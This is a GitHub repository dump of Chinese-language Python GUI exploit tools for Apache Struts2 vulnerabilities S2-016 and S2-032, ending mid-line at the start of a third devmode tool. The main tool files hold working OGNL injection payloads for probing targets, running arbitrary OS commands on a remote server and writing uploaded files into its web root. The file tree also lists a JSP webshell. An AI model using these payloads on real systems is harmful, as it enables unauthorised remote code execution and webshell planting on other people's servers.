├── .gitattributes ├── .gitignore ├── S2-016利用工具(Python 3) ├── PoC(检测是否存在漏洞).png ├── S2-016.py ├── s2016.py ├── 执行命令.png ├── 文件上传.png ├── 未存在漏洞.png └── 程序界面.png ├── S2-032利用工具(Python 3) ├── PoC(检测是否存在漏洞).png ├── S2-032利用工具.py ├── s2032.py ├── 执行命令.png ├── 报错.png ├── 文件上传.png ├── 未存在漏洞.png └── 程序界面.png ├── S2-devmode漏洞利用工具(Python 3) ├── PoC.png ├── S2-devmode漏洞利用工具.py ├── s2devmode.py ├── 手工测试.png ├── 手工测试2.png ├── 执行命令.png ├── 执行命令2.png ├── 文件上传1.png ├── 文件上传1验证.png ├── 文件上传2.png ├── 文件上传2验证.png ├── 站点2-执行命令.png └── 编写参考.txt ├── Strust2漏洞 EXP代码.txt └── 一句话木马(工具中可能使用).jsp /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask instance folder 57 | instance/ 58 | 59 | # Scrapy stuff: 60 | .scrapy 61 | 62 | # Sphinx documentation 63 | docs/_build/ 64 | 65 | # PyBuilder 66 | target/ 67 | 68 | # IPython Notebook 69 | .ipynb_checkpoints 70 | 71 | # pyenv 72 | .python-version 73 | 74 | # celery beat schedule file 75 | celerybeat-schedule 76 | 77 | # dotenv 78 | .env 79 | 80 | # virtualenv 81 | venv/ 82 | ENV/ 83 | 84 | # Spyder project settings 85 | .spyderproject 86 | 87 | # Rope project settings 88 | .ropeproject 89 | 90 | # ========================= 91 | # Operating System Files 92 | # ========================= 93 | 94 | # OSX 95 | # ========================= 96 | 97 | .DS_Store 98 | .AppleDouble 99 | .LSOverride 100 | 101 | # Thumbnails 102 | ._* 103 | 104 | # Files that might appear in the root of a volume 105 | .DocumentRevisions-V100 106 | .fseventsd 107 | .Spotlight-V100 108 | .TemporaryItems 109 | .Trashes 110 | .VolumeIcon.icns 111 | 112 | # Directories potentially created on remote AFP share 113 | .AppleDB 114 | .AppleDesktop 115 | Network Trash Folder 116 | Temporary Items 117 | .apdisk 118 | 119 | # Windows 120 | # ========================= 121 | 122 | # Windows image file caches 123 | Thumbs.db 124 | ehthumbs.db 125 | 126 | # Folder config file 127 | Desktop.ini 128 | 129 | # Recycle Bin used on file shares 130 | $RECYCLE.BIN/ 131 | 132 | # Windows Installer files 133 | *.cab 134 | *.msi 135 | *.msm 136 | *.msp 137 | 138 | # Windows shortcuts 139 | *.lnk 140 | -------------------------------------------------------------------------------- /S2-016利用工具(Python 
3)/PoC(检测是否存在漏洞).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/PoC(检测是否存在漏洞).png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/S2-016.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import sys 3 | from PyQt4 import QtCore, QtGui, QtWebKit 4 | from s2016 import Ui_MainWindow 5 | import urllib.request 6 | import urllib.parse 7 | import urllib 8 | import requests 9 | 10 | class StartQt4(QtGui.QMainWindow): 11 | def __init__(self, parent=None): 12 | QtGui.QWidget.__init__(self, parent) 13 | self.ui = Ui_MainWindow() #框主题名称 14 | self.ui.setupUi(self) 15 | QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go) 16 | QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go) 17 | QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode) 18 | QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog) 19 | 20 | def PoC(self): 21 | payload = "?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D" 22 | target_url = (self.address + payload) 23 | #print(target_url) 24 | try: 25 | req = urllib.request.Request(target_url, method = "GET") 26 | response = urllib.request.urlopen(req) 27 | if response: 28 | data = response.read() 29 | data = str(data, encoding = "utf-8") 30 | self.ui.textBrowser.setText("测试结果:\n%s" 
%(data)) #将结果输出至textBrowser 31 | except Exception as e: 32 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 33 | 34 | def cmd(self): 35 | self.command = str(self.ui.command.text()) 36 | #payload = "%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{command})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()".format(command = self.command) 37 | payload = "?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{" + '"' + self.command + '"'+ "})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23mat.getWriter().close()}" 38 | target_url = (self.address + payload) 39 | #print(target_url) 40 | try: 41 | req = requests.get(target_url) 42 | data = req.content 43 | #print(data) 44 | data = str(data, encoding = "utf-8") 45 | self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser 46 | except Exception as e: 47 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 48 | 49 | def Go(self): 50 | self.address = str(self.ui.lineEdit.text()) 51 | if self.address: 52 | if self.address.find('://') == -1: 53 | self.address = 'http://' + self.address 54 | if self.ui.comboBox.currentIndex() == 0: 55 | self.PoC() 56 | if self.ui.comboBox.currentIndex() == 1: 57 | self.cmd() 58 | elif self.ui.comboBox.currentIndex() == 2: 59 | self.upload() 60 | 61 | def file_dialog(self): 62 | fd = QtGui.QFileDialog(self) 63 | self.file = fd.getOpenFileName() 64 | from os.path import isfile 65 | if 
isfile(self.file): 66 | import codecs 67 | text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框 68 | self.filename = str(self.ui.filename.text()) 69 | 70 | def upload(self): 71 | content = (open(self.file, "r").read()) 72 | data = {"t":content} 73 | #print(content) 74 | payload = "?redirect:${{%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3dfalse%2c%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%5d%2c%23b%3dnew+java.io.FileOutputStream(new+java.lang.StringBuilder(%23a.getRealPath(%22/%22)).append(@java.io.File@separator).append(%22"+ self.filename + '%22))%2c%23b.write(%23a.getParameter("t").getBytes())%2c%23b.close%28%29%2c%23p%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%5d.getWriter%28%29%2c%23p.println%28%22DONE%22%29%2c%23p.flush%28%29%2c%23p.close%28%29}}' 75 | #payload = payload.replace(' ', '') 76 | #print(payload) 77 | target_url = (self.address + payload) 78 | try: 79 | #print(target_url) 80 | req = urllib.request.Request(target_url, urllib.parse.urlencode(data).encode("UTF-8"), method = "POST") 81 | response = urllib.request.urlopen(req) 82 | data = response.read() 83 | data = str(data, encoding = "utf-8") 84 | self.ui.textBrowser.setText("上传成功,文件已上传至网站根目录下:\n%s" %(data)) #将结果输出至textBrowser 85 | except Exception as e: 86 | #print(e) 87 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 88 | def mode(self): 89 | self.ui.comboBox.currentIndex() 90 | 91 | 92 | 93 | if __name__ == "__main__": 94 | app = QtGui.QApplication(sys.argv) 95 | myapp = StartQt4() 96 | myapp.show() 97 | sys.exit(app.exec_()) 98 | -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/s2016.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Form implementation generated from reading ui file 's2016.ui' 4 | # 5 | # Created 
by: PyQt4 UI code generator 4.11.4 6 | # 7 | # WARNING! All changes made in this file will be lost! 8 | 9 | from PyQt4 import QtCore, QtGui 10 | 11 | try: 12 | _fromUtf8 = QtCore.QString.fromUtf8 13 | except AttributeError: 14 | def _fromUtf8(s): 15 | return s 16 | 17 | try: 18 | _encoding = QtGui.QApplication.UnicodeUTF8 19 | def _translate(context, text, disambig): 20 | return QtGui.QApplication.translate(context, text, disambig, _encoding) 21 | except AttributeError: 22 | def _translate(context, text, disambig): 23 | return QtGui.QApplication.translate(context, text, disambig) 24 | 25 | class Ui_MainWindow(object): 26 | def setupUi(self, MainWindow): 27 | MainWindow.setObjectName(_fromUtf8("MainWindow")) 28 | MainWindow.resize(866, 402) 29 | font = QtGui.QFont() 30 | font.setFamily(_fromUtf8("宋体")) 31 | font.setPointSize(10) 32 | font.setBold(True) 33 | font.setWeight(75) 34 | MainWindow.setFont(font) 35 | self.centralwidget = QtGui.QWidget(MainWindow) 36 | self.centralwidget.setObjectName(_fromUtf8("centralwidget")) 37 | self.lineEdit = QtGui.QLineEdit(self.centralwidget) 38 | self.lineEdit.setGeometry(QtCore.QRect(20, 20, 721, 31)) 39 | self.lineEdit.setObjectName(_fromUtf8("lineEdit")) 40 | self.pushButton = QtGui.QPushButton(self.centralwidget) 41 | self.pushButton.setGeometry(QtCore.QRect(760, 20, 71, 31)) 42 | self.pushButton.setObjectName(_fromUtf8("pushButton")) 43 | self.textBrowser = QtGui.QTextBrowser(self.centralwidget) 44 | self.textBrowser.setGeometry(QtCore.QRect(20, 120, 811, 221)) 45 | font = QtGui.QFont() 46 | font.setFamily(_fromUtf8("宋体")) 47 | self.textBrowser.setFont(font) 48 | self.textBrowser.setObjectName(_fromUtf8("textBrowser")) 49 | self.comboBox = QtGui.QComboBox(self.centralwidget) 50 | self.comboBox.setGeometry(QtCore.QRect(130, 70, 101, 31)) 51 | self.comboBox.setObjectName(_fromUtf8("comboBox")) 52 | self.comboBox.addItem(_fromUtf8("")) 53 | self.comboBox.addItem(_fromUtf8("")) 54 | self.comboBox.addItem(_fromUtf8("")) 55 | 
self.filename = QtGui.QLineEdit(self.centralwidget) 56 | self.filename.setGeometry(QtCore.QRect(580, 70, 131, 31)) 57 | self.filename.setObjectName(_fromUtf8("filename")) 58 | self.label = QtGui.QLabel(self.centralwidget) 59 | self.label.setGeometry(QtCore.QRect(460, 70, 101, 31)) 60 | font = QtGui.QFont() 61 | font.setFamily(_fromUtf8("宋体")) 62 | font.setPointSize(10) 63 | font.setBold(True) 64 | font.setWeight(75) 65 | self.label.setFont(font) 66 | self.label.setObjectName(_fromUtf8("label")) 67 | self.pushButton_2 = QtGui.QPushButton(self.centralwidget) 68 | self.pushButton_2.setGeometry(QtCore.QRect(720, 70, 111, 31)) 69 | self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) 70 | self.label_2 = QtGui.QLabel(self.centralwidget) 71 | self.label_2.setGeometry(QtCore.QRect(20, 70, 101, 31)) 72 | font = QtGui.QFont() 73 | font.setFamily(_fromUtf8("宋体")) 74 | font.setPointSize(10) 75 | font.setBold(True) 76 | font.setWeight(75) 77 | self.label_2.setFont(font) 78 | self.label_2.setObjectName(_fromUtf8("label_2")) 79 | self.label_3 = QtGui.QLabel(self.centralwidget) 80 | self.label_3.setGeometry(QtCore.QRect(260, 70, 61, 31)) 81 | self.label_3.setObjectName(_fromUtf8("label_3")) 82 | self.command = QtGui.QLineEdit(self.centralwidget) 83 | self.command.setGeometry(QtCore.QRect(330, 70, 111, 31)) 84 | self.command.setObjectName(_fromUtf8("command")) 85 | MainWindow.setCentralWidget(self.centralwidget) 86 | self.menubar = QtGui.QMenuBar(MainWindow) 87 | self.menubar.setGeometry(QtCore.QRect(0, 0, 866, 26)) 88 | self.menubar.setObjectName(_fromUtf8("menubar")) 89 | MainWindow.setMenuBar(self.menubar) 90 | self.statusbar = QtGui.QStatusBar(MainWindow) 91 | self.statusbar.setObjectName(_fromUtf8("statusbar")) 92 | MainWindow.setStatusBar(self.statusbar) 93 | 94 | self.retranslateUi(MainWindow) 95 | QtCore.QMetaObject.connectSlotsByName(MainWindow) 96 | 97 | def retranslateUi(self, MainWindow): 98 | MainWindow.setWindowTitle(_translate("MainWindow", "S2-016利用工具 Coder: 
crown prince", None)) 99 | self.pushButton.setText(_translate("MainWindow", "Go", None)) 100 | self.comboBox.setItemText(0, _translate("MainWindow", "PoC", None)) 101 | self.comboBox.setItemText(1, _translate("MainWindow", "执行命令", None)) 102 | self.comboBox.setItemText(2, _translate("MainWindow", "文件上传", None)) 103 | self.label.setText(_translate("MainWindow", "上传文件名:", None)) 104 | self.pushButton_2.setText(_translate("MainWindow", " 选择文件:", None)) 105 | self.label_2.setText(_translate("MainWindow", " 模式选择:", None)) 106 | self.label_3.setText(_translate("MainWindow", "命令:", None)) 107 | 108 | -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/执行命令.png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/文件上传.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/文件上传.png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/未存在漏洞.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/未存在漏洞.png -------------------------------------------------------------------------------- /S2-016利用工具(Python 3)/程序界面.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-016利用工具(Python 3)/程序界面.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 
3)/PoC(检测是否存在漏洞).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/PoC(检测是否存在漏洞).png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/S2-032利用工具.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import sys 3 | from PyQt4 import QtCore, QtGui, QtWebKit 4 | from s2032 import Ui_MainWindow 5 | import urllib.request 6 | import urllib.parse 7 | import urllib 8 | 9 | class StartQt4(QtGui.QMainWindow): 10 | def __init__(self, parent=None): 11 | QtGui.QWidget.__init__(self, parent) 12 | self.ui = Ui_MainWindow() #框主题名称 13 | self.ui.setupUi(self) 14 | QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go) 15 | QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go) 16 | QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode) 17 | QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog) 18 | 19 | def PoC(self): 20 | payload= "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23parameters.content[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=S2-032%20dir--***" 21 | target_url = (self.address + payload) 22 | #print(target_url) 23 | try: 24 | req = urllib.request.Request(target_url, method = "GET") 25 | 
response = urllib.request.urlopen(req) 26 | if response: 27 | data = response.read() 28 | data = str(data, encoding = "utf-8") 29 | self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser 30 | except Exception as e: 31 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 32 | 33 | def cmd(self): 34 | self.command = str(self.ui.command.text()) 35 | payload= "?method:%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%23parameters.command%5B0%5D%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char%5B51020%5D%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close&command=" 36 | target_url = (self.address + payload + self.command) 37 | #print(target_url) 38 | try: 39 | req = urllib.request.Request(target_url, method = "GET") 40 | response = urllib.request.urlopen(req) 41 | data = response.read() 42 | data = str(data, encoding = "utf-8") 43 | self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser 44 | except Exception as e: 45 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 46 | 47 | def Go(self): 48 | self.address = str(self.ui.lineEdit.text()) 49 | if self.address: 50 | if self.address.find('://') == -1: 51 | self.address = 'http://' + self.address 52 | if self.ui.comboBox.currentIndex() == 0: 53 | self.PoC() 54 | if self.ui.comboBox.currentIndex() == 1: 55 | self.cmd() 56 | elif self.ui.comboBox.currentIndex() == 2: 57 | self.upload() 58 | 59 | def file_dialog(self): 60 | fd = QtGui.QFileDialog(self) 61 | self.file = fd.getOpenFileName() 62 | from os.path import isfile 63 | if isfile(self.file): 64 | import codecs 65 | text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框 66 | self.filename = str(self.ui.filename.text()) 67 | 68 | def 
upload(self): 69 | content = (open(self.file, "r").read()) 70 | #print(content) 71 | temp = "&reqobj=%s&content=%s" %(self.filename, content) 72 | payload = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f" 73 | #payload = payload.replace(' ', '') 74 | #print(payload) 75 | target_url = (self.address + payload + temp) 76 | try: 77 | #print(target_url) 78 | req = urllib.request.Request(target_url, method = "GET") 79 | response = urllib.request.urlopen(req) 80 | data = response.read() 81 | data = str(data, encoding = "utf-8") 82 | self.ui.textBrowser.setText("上传成功,文件路径是:\n%s" %(data)) #将结果输出至textBrowser 83 | except Exception as e: 84 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 85 | def mode(self): 86 | self.ui.comboBox.currentIndex() 87 | 88 | 89 | 90 | if __name__ == "__main__": 91 | app = QtGui.QApplication(sys.argv) 92 | myapp = StartQt4() 93 | myapp.show() 94 | sys.exit(app.exec_()) 95 | -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/s2032.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Form implementation generated from reading ui file 's2032.ui' 4 | # 5 | # Created by: PyQt4 UI code generator 4.11.4 6 | # 7 | # WARNING! All changes made in this file will be lost! 
8 | 9 | from PyQt4 import QtCore, QtGui 10 | 11 | try: 12 | _fromUtf8 = QtCore.QString.fromUtf8 13 | except AttributeError: 14 | def _fromUtf8(s): 15 | return s 16 | 17 | try: 18 | _encoding = QtGui.QApplication.UnicodeUTF8 19 | def _translate(context, text, disambig): 20 | return QtGui.QApplication.translate(context, text, disambig, _encoding) 21 | except AttributeError: 22 | def _translate(context, text, disambig): 23 | return QtGui.QApplication.translate(context, text, disambig) 24 | 25 | class Ui_MainWindow(object): 26 | def setupUi(self, MainWindow): 27 | MainWindow.setObjectName(_fromUtf8("MainWindow")) 28 | MainWindow.resize(866, 402) 29 | font = QtGui.QFont() 30 | font.setFamily(_fromUtf8("宋体")) 31 | font.setPointSize(10) 32 | font.setBold(True) 33 | font.setWeight(75) 34 | MainWindow.setFont(font) 35 | self.centralwidget = QtGui.QWidget(MainWindow) 36 | self.centralwidget.setObjectName(_fromUtf8("centralwidget")) 37 | self.lineEdit = QtGui.QLineEdit(self.centralwidget) 38 | self.lineEdit.setGeometry(QtCore.QRect(20, 20, 721, 31)) 39 | self.lineEdit.setObjectName(_fromUtf8("lineEdit")) 40 | self.pushButton = QtGui.QPushButton(self.centralwidget) 41 | self.pushButton.setGeometry(QtCore.QRect(760, 20, 71, 31)) 42 | self.pushButton.setObjectName(_fromUtf8("pushButton")) 43 | self.textBrowser = QtGui.QTextBrowser(self.centralwidget) 44 | self.textBrowser.setGeometry(QtCore.QRect(20, 120, 811, 221)) 45 | font = QtGui.QFont() 46 | font.setFamily(_fromUtf8("宋体")) 47 | self.textBrowser.setFont(font) 48 | self.textBrowser.setObjectName(_fromUtf8("textBrowser")) 49 | self.comboBox = QtGui.QComboBox(self.centralwidget) 50 | self.comboBox.setGeometry(QtCore.QRect(130, 70, 101, 31)) 51 | self.comboBox.setObjectName(_fromUtf8("comboBox")) 52 | self.comboBox.addItem(_fromUtf8("")) 53 | self.comboBox.addItem(_fromUtf8("")) 54 | self.comboBox.addItem(_fromUtf8("")) 55 | self.filename = QtGui.QLineEdit(self.centralwidget) 56 | self.filename.setGeometry(QtCore.QRect(580, 70, 
131, 31)) 57 | self.filename.setObjectName(_fromUtf8("filename")) 58 | self.label = QtGui.QLabel(self.centralwidget) 59 | self.label.setGeometry(QtCore.QRect(460, 70, 101, 31)) 60 | font = QtGui.QFont() 61 | font.setFamily(_fromUtf8("宋体")) 62 | font.setPointSize(10) 63 | font.setBold(True) 64 | font.setWeight(75) 65 | self.label.setFont(font) 66 | self.label.setObjectName(_fromUtf8("label")) 67 | self.pushButton_2 = QtGui.QPushButton(self.centralwidget) 68 | self.pushButton_2.setGeometry(QtCore.QRect(720, 70, 111, 31)) 69 | self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) 70 | self.label_2 = QtGui.QLabel(self.centralwidget) 71 | self.label_2.setGeometry(QtCore.QRect(20, 70, 101, 31)) 72 | font = QtGui.QFont() 73 | font.setFamily(_fromUtf8("宋体")) 74 | font.setPointSize(10) 75 | font.setBold(True) 76 | font.setWeight(75) 77 | self.label_2.setFont(font) 78 | self.label_2.setObjectName(_fromUtf8("label_2")) 79 | self.label_3 = QtGui.QLabel(self.centralwidget) 80 | self.label_3.setGeometry(QtCore.QRect(260, 70, 61, 31)) 81 | self.label_3.setObjectName(_fromUtf8("label_3")) 82 | self.command = QtGui.QLineEdit(self.centralwidget) 83 | self.command.setGeometry(QtCore.QRect(330, 70, 111, 31)) 84 | self.command.setObjectName(_fromUtf8("command")) 85 | MainWindow.setCentralWidget(self.centralwidget) 86 | self.menubar = QtGui.QMenuBar(MainWindow) 87 | self.menubar.setGeometry(QtCore.QRect(0, 0, 866, 26)) 88 | self.menubar.setObjectName(_fromUtf8("menubar")) 89 | MainWindow.setMenuBar(self.menubar) 90 | self.statusbar = QtGui.QStatusBar(MainWindow) 91 | self.statusbar.setObjectName(_fromUtf8("statusbar")) 92 | MainWindow.setStatusBar(self.statusbar) 93 | 94 | self.retranslateUi(MainWindow) 95 | QtCore.QMetaObject.connectSlotsByName(MainWindow) 96 | 97 | def retranslateUi(self, MainWindow): 98 | MainWindow.setWindowTitle(_translate("MainWindow", "S2-032利用工具 Coder: crown prince", None)) 99 | self.pushButton.setText(_translate("MainWindow", "Go", None)) 100 | 
self.comboBox.setItemText(0, _translate("MainWindow", "PoC", None)) 101 | self.comboBox.setItemText(1, _translate("MainWindow", "执行命令", None)) 102 | self.comboBox.setItemText(2, _translate("MainWindow", "文件上传", None)) 103 | self.label.setText(_translate("MainWindow", "上传文件名:", None)) 104 | self.pushButton_2.setText(_translate("MainWindow", " 选择文件:", None)) 105 | self.label_2.setText(_translate("MainWindow", " 模式选择:", None)) 106 | self.label_3.setText(_translate("MainWindow", "命令:", None)) 107 | 108 | -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/执行命令.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/报错.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/报错.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/文件上传.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/文件上传.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/未存在漏洞.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/未存在漏洞.png -------------------------------------------------------------------------------- /S2-032利用工具(Python 3)/程序界面.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-032利用工具(Python 3)/程序界面.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/PoC.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/PoC.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/S2-devmode漏洞利用工具.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import sys 3 | from PyQt4 import QtCore, QtGui, QtWebKit 4 | from s2devmode import Ui_MainWindow 5 | import urllib.request 6 | import urllib.parse 7 | import urllib 8 | import requests 9 | 10 | class StartQt4(QtGui.QMainWindow): 11 | def __init__(self, parent=None): 12 | QtGui.QWidget.__init__(self, parent) 13 | self.ui = Ui_MainWindow() #框主题名称 14 | self.ui.setupUi(self) 15 | QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go) 16 | QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go) 17 | QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode) 18 | QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog) 19 | 20 | def PoC(self): 21 | payload= 